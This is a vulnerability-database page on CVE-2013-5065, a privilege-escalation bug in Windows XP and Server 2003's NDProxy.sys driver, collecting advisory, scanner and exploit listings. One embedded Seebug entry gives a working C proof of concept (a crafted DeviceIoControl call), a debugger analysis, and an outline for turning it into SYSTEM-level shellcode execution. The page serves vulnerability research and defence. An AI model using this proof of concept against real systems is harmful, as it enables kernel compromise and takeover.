Vulnerabilities > CVE-2013-5065 - Improper Input Validation vulnerability in Microsoft Windows 2003 Server and Windows XP
Attack vector
LOCAL Attack complexity
LOW Privileges required
NONE Confidentiality impact
COMPLETE Integrity impact
COMPLETE Availability impact
COMPLETE Summary
NDProxy.sys in the kernel in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allows local users to gain privileges via a crafted application, as exploited in the wild in November 2013. Per: http://technet.microsoft.com/en-us/security/bulletin/ms14-002 "This security update also addresses the vulnerability first described in Microsoft Security Advisory 2814486."
Vulnerable Configurations
Part | Description | Count |
---|---|---|
OS | 3 |
Common Weakness Enumeration (CWE)
Common Attack Pattern Enumeration and Classification (CAPEC)
- Buffer Overflow via Environment Variables This attack pattern involves causing a buffer overflow through manipulation of environment variables. Once the attacker finds that they can modify an environment variable, they may try to overflow associated buffers. This attack leverages implicit trust often placed in environment variables.
- Server Side Include (SSI) Injection An attacker can use Server Side Include (SSI) Injection to send code to a web application that then gets executed by the web server. Doing so enables the attacker to achieve similar results to Cross Site Scripting, viz., arbitrary code execution and information disclosure, albeit on a more limited scale, since the SSI directives are nowhere near as powerful as a full-fledged scripting language. Nonetheless, the attacker can conveniently gain access to sensitive files, such as password files, and execute shell commands.
- Cross Zone Scripting An attacker is able to cause a victim to load content into their web-browser that bypasses security zone controls and gain access to increased privileges to execute scripting code or other web objects such as unsigned ActiveX controls or applets. This is a privilege elevation attack targeted at zone-based web-browser security. In a zone-based model, pages belong to one of a set of zones corresponding to the level of privilege assigned to that page. Pages in an untrusted zone would have a lesser level of access to the system and/or be restricted in the types of executable content it was allowed to invoke. In a cross-zone scripting attack, a page that should be assigned to a less privileged zone is granted the privileges of a more trusted zone. This can be accomplished by exploiting bugs in the browser, exploiting incorrect configuration in the zone controls, through a cross-site scripting attack that causes the attackers' content to be treated as coming from a more trusted page, or by leveraging some piece of system functionality that is accessible from both the trusted and less trusted zone. This attack differs from "Restful Privilege Escalation" in that the latter correlates to the inadequate securing of RESTful access methods (such as HTTP DELETE) on the server, while cross-zone scripting attacks the concept of security zones as implemented by a browser.
- Cross Site Scripting through Log Files An attacker may leverage a system weakness where logs are susceptible to log injection to insert scripts into the system's logs. If these logs are later viewed by an administrator through a thin administrative interface and the log data is not properly HTML encoded before being written to the page, the attackers' scripts stored in the log will be executed in the administrative interface with potentially serious consequences. This attack pattern is really a combination of two other attack patterns: log injection and stored cross site scripting.
- Command Line Execution through SQL Injection An attacker uses standard SQL injection methods to inject data into the command line for execution. This could be done directly through misuse of directives such as MSSQL_xp_cmdshell or indirectly through injection of data into the database that would be interpreted as shell commands. Sometime later, an unscrupulous backend application (or could be part of the functionality of the same application) fetches the injected data stored in the database and uses this data as command line arguments without performing proper validation. The malicious data escapes that data plane by spawning new commands to be executed on the host.
Exploit-Db
description Microsoft Windows ndproxy.sys - Local Privilege Escalation. CVE-2013-5065. Local exploit for windows platform id EDB-ID:30392 last seen 2016-02-03 modified 2013-12-17 published 2013-12-17 reporter metasploit source https://www.exploit-db.com/download/30392/ title Microsoft Windows ndproxy.sys - Local Privilege Escalation description Windows NDPROXY Local SYSTEM Privilege Escalation. CVE-2013-5065. Local exploit for windows platform id EDB-ID:30014 last seen 2016-02-03 modified 2013-12-03 published 2013-12-03 reporter ryujin source https://www.exploit-db.com/download/30014/ title Windows NDPROXY - Local SYSTEM Privilege Escalation MS14-002 description Windows NDProxy - Privilege Escalation XP SP3 x86 and 2003 SP2 x86 (MS14-002). CVE-2013-5065. Local exploit for win32 platform file exploits/windows_x86/local/37732.c id EDB-ID:37732 last seen 2016-02-04 modified 2015-08-07 platform windows_x86 port published 2015-08-07 reporter Tomislav Paskalev source https://www.exploit-db.com/download/37732/ title Windows NDProxy - Privilege Escalation XP SP3 x86 and 2003 SP2 x86 MS14-002 type local
Metasploit
description | This module exploits a flaw in the ndproxy.sys driver on Windows XP SP3 and Windows 2003 SP2 systems, exploited in the wild in November, 2013. The vulnerability exists while processing an IO Control Code 0x8fff23c8 or 0x8fff23cc, where user provided input is used to access an array unsafely, and the value is used to perform a call, leading to a NULL pointer dereference which is exploitable on both Windows XP and Windows 2003 systems. This module has been tested successfully on Windows XP SP3 and Windows 2003 SP2. In order to work the service "Routing and Remote Access" must be running on the target system. |
id | MSF:EXPLOIT/WINDOWS/LOCAL/MS_NDPROXY |
last seen | 2020-05-24 |
modified | 2018-03-29 |
published | 2013-12-11 |
references |
|
reporter | Rapid7 |
source | https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/ms_ndproxy.rb |
title | MS14-002 Microsoft Windows ndproxy.sys Local Privilege Escalation |
Msbulletin
bulletin_id | MS14-002 |
bulletin_url | |
date | 2014-01-14T00:00:00 |
impact | Elevation of Privilege |
knowledgebase_id | 2914368 |
knowledgebase_url | |
severity | Important |
title | Vulnerability in Windows Kernel Could Allow Elevation of Privilege |
Nessus
NASL family Windows : Microsoft Bulletins NASL id SMB_NT_MS14-002.NASL description The Windows kernel on the remote host is affected by a privilege escalation vulnerability. Specifically, the vulnerability exists in the version of NDProxy.sys. If successfully exploited, a locally authenticated attacker could run a specially crafted application in kernel mode to take control of the system. last seen 2020-06-01 modified 2020-06-02 plugin id 71942 published 2014-01-14 reporter This script is Copyright (C) 2014-2018 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/71942 title MS14-002: Vulnerability in Windows Kernel Could Allow Elevation of Privilege (2914368) NASL family Windows NASL id SMB_KB2914486.NASL description The remote host has an unspecified privilege elevation vulnerability in NDProxy.sys, a system-provided communications driver. Successful exploitation of this vulnerability could allow an attacker to run arbitrary code in kernel mode. Additionally, the attacker could view, change or even delete data, as well as install programs and/or create new accounts with full administrative rights. last seen 2017-10-29 modified 2014-01-19 plugin id 71140 published 2013-11-29 reporter Tenable source https://www.tenable.com/plugins/index.php?view=single&id=71140 title KB2914486: Vulnerability in Microsoft Windows Kernel Could Allow Elevation of Privilege
Packetstorm
data source https://packetstormsecurity.com/files/download/124294/windowsndproxy-escalate.txt id PACKETSTORM:124294 last seen 2016-12-05 published 2013-12-05 reporter ryujin source https://packetstormsecurity.com/files/124294/Microsoft-Windows-NDPROXY-Local-SYSTEM-Privilege-Escalation.html title Microsoft Windows NDPROXY Local SYSTEM Privilege Escalation data source https://packetstormsecurity.com/files/download/124466/ms_ndproxy.rb.txt id PACKETSTORM:124466 last seen 2016-12-05 published 2013-12-17 reporter juan vazquez source https://packetstormsecurity.com/files/124466/Microsoft-Windows-ndproxy.sys-Local-Privilege-Escalation.html title Microsoft Windows ndproxy.sys Local Privilege Escalation data source https://packetstormsecurity.com/files/download/132986/windowsndproxyms14002-escalate.txt id PACKETSTORM:132986 last seen 2016-12-05 published 2015-08-07 reporter Tomislav Paskalev source https://packetstormsecurity.com/files/132986/MS14-002-Windows-NDProxy-Privilege-Escalation.html title MS14-002 Windows NDProxy Privilege Escalation
Seebug
bulletinFamily exploit description No description provided by source. id SSV:83789 last seen 2017-11-19 modified 2014-07-01 published 2014-07-01 reporter Root source https://www.seebug.org/vuldb/ssvid-83789 title Microsoft Windows ndproxy.sys - Local Privilege Escalation bulletinFamily exploit description # 漏洞成因 这是一个windows内核漏洞,漏洞的触发需要开启Routing and Remote Access服务,影响 windowsxp,windows2003. 先上 poc ```c #include <windows.h> #include <stdio.h> int main() { HANDLE hDev = CreateFile("\\\\.\\NDProxy", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL); if(hDev==INVALID_HANDLE_VALUE) { printf("CreateFile Error:%d\n",GetLastError()); } DWORD InBuf[0x15] = {0}; DWORD dwRetBytes = 0; *(InBuf+5) = 0x7030125; *(InBuf+7) = 0x34; DeviceIoControl(hDev, 0x8fff23cc, InBuf, 0x54, InBuf, 0x24, &dwRetBytes, 0); CloseHandle(hDev); return 0; } ``` **注意**:这个POC是运行的结果是蓝屏,请在虚拟机下运行! 在XP下编译好POC代码,然后运行编译出来的EXE,双机调试,断在windbg,提示 ``` Access violation - code c0000005 (!!! second chance !!!) 00000038 jQuery21405265350940171629_1451585769819 ??? ``` 当前EIP执行到了0x38这个内核地址。 栈回溯,看看出错前都调了什么函数 ``` kd> kb ChildEBP RetAddr Args to Child WARNING: Frame IP not in any known module. Following frames may be wrong. b235dc14 f87bd145 822e6dc8 82117ef8 8227b410 0x38 b235dc34 804ef189 8227b2b8 000001b0 806d42d0 NDProxy!PxIODispatch+0x2b3 ``` 提示现在的栈有可能已经不正确了,看到前一个正常调用的函数是`NDProxy!PxIODispatch+0x2b3` 用IDA加载ndproxy.sys模块(Xp下的路径为 C:\WINDOWS\system32\drivers\ndproxy.sys),去这个函数看看 ![](http://7xn4yz.com1.z0.glb.clouddn.com/2015-12-31%E5%9B%BE%E7%89%871.png) 这是一个函数地址表,起始地址00018188, ![](http://7xn4yz.com1.z0.glb.clouddn.com/2015-12-31%E5%9B%BE%E7%89%872.png) 结束地址0001832C ![](http://7xn4yz.com1.z0.glb.clouddn.com/2015-12-31%E5%9B%BE%E7%89%873.png) 那么这个表的大小就是0x1a4 重启虚拟机,在call off_18188[eax]处下断,查看此时eax的值 ``` kd> r eax eax=000001b0 ``` 那么是call到18188+1b0 = 18338h,已经超过了表的大小,根据图3,可以看到这个地址是0x38,会出现第一步的crash到0x38。所以说这里的问题是数组指针越界了。 --- # 进一步分析eax怎么来的 先看这个API ``` BOOL WINAPI DeviceIoControl( __in HANDLE hDevice, //设备句柄 __in DWORD dwIoControlCode, //设备操作控制码 __in_bcount_opt(nInBufferSize) LPVOID lpInBuffer, //设备请求数据的buffer,inbuffer __in DWORD nInBufferSize, //inbuffer大小 __out_bcount_part_opt(nOutBufferSize, *lpBytesReturned) LPVOID lpOutBuffer, //OutBuffer __in DWORD nOutBufferSize, //OutBuffer大小 __out_opt LPDWORD lpBytesReturned, //实际返回到OutBuffer __inout_opt LPOVERLAPPED lpOverlapped ); ``` IDA里看到PxIODispatch函数先会比较IO控制码(DeviceIoControl函数中的参数2) ![](http://7xn4yz.com1.z0.glb.clouddn.com/2015-12-31%E5%9B%BE%E7%89%874.png) 单步来到 ![](http://7xn4yz.com1.z0.glb.clouddn.com/2015-12-31%E5%9B%BE%E7%89%875.png) 动态调试查看此时edi被赋值后的值 ``` NDProxy!PxIODispatch+0x1ea: f87bd07c 8b7d0c mov edi,dword ptr [ebp+0Ch] kd> r edi edi=00000054 ``` 是inbufferSize(DeviceIoControl函数中的参数4),和edx=0x24比较 单步来到 ![](http://7xn4yz.com1.z0.glb.clouddn.com/2015-12-31%E5%9B%BE%E7%89%876.png) 查看ecx的值 ``` kd> r ecx ecx=00000024 ``` 是outbufferSize(DeviceIoControl函数中的参数6),和edx=0x24比较 单步到 ``` f87bd092 8b4614 mov eax,dword ptr [esi+14h] f87bd095 2d01010307 sub eax,7030101h f87bd09a 3bc2 cmp eax,edx f87bd09c 8955fc mov dword ptr [ebp-4],edx f87bd09f 760c jbe NDProxy!PxIODispatch+0x21b (f87bd0ad) ``` 这里是漏洞形成的关键,查看此时esi指向的内存 ``` kd> dd esi 82046c28 00000000 00000000 00000000 00000000 82046c38 00000000 07030125 00000000 00000034 82046c48 00000000 00000000 00000000 00000000 ``` 看到07030125这个值是DeviceIoControl函数中的参数2,正好是esi+14h。把这个值给了eax,,做减法跳走 ![](http://7xn4yz.com1.z0.glb.clouddn.com/2015-12-31%E5%9B%BE%E7%89%877.png) 然后eax=eax*3;eax=eax*4;相当于 eax = eax *12,并且暂存。 接下来 ![](http://7xn4yz.com1.z0.glb.clouddn.com/2015-12-31%E5%9B%BE%E7%89%878.png) 在蓝色箭头的部分,恢复eax的值,直接作为函数表的索引,进行调用。 那么我们按上面的流程计算: ```python >>> hex((0x07030125 - 0x7030101)*12) '0x1b0' ``` 刚好是crash时,eax的值。 漏洞形成的原因就是把程序的输入buffer中的数,计算后的值当作函数指针操作,产生了bug。 --- # 进一步利用 因为是在xp下是有办法在ring3写kernel的地址的,所以这个poc可以进一步修改,做利用。 利用的思路是在地址0x38处写一句,push shellcode地址,然后ret,就能到执行到shellcode了。代码有点长,就不贴了,打包了代码和编译好的exp在压缩包里(请在虚拟机 xp下使用,可以提权到system权限获得shell)。 id SSV:83482 last seen 2017-11-19 modified 2014-07-01 published 2014-07-01 reporter Root source https://www.seebug.org/vuldb/ssvid-83482 title Windows NDPROXY - 本地权限提升漏洞(MS14-002)
The Hacker News
id THN:1EA4AB16D6C3A0518A078CC8C9304FA5 last seen 2017-01-08 modified 2013-11-29 published 2013-11-29 reporter Mohit Kumar source http://thehackernews.com/2013/11/CVE-2013-5065-Windows-XP-Privilege-escalation-Zero-Day-exploit.html title CVE-2013-5065: Microsoft Windows XP and Server 2003 Privilege escalation Zero-Day exploit discovered id THN:2BA81AD2F8F7B8FE383C85260BD9F089 last seen 2018-01-27 modified 2013-12-10 published 2013-12-10 reporter Wang Wei source https://thehackernews.com/2013/12/microsoft-released-security-patch-for.html title Microsoft released Security Patch for CVE-2013-5065 TIFF Zero-Day vulnerability
References
- http://technet.microsoft.com/security/advisory/2914486
- http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html
- https://docs.microsoft.com/en-us/security-updates/securitybulletins/2014/ms14-002
- https://www.exploit-db.com/exploits/37732/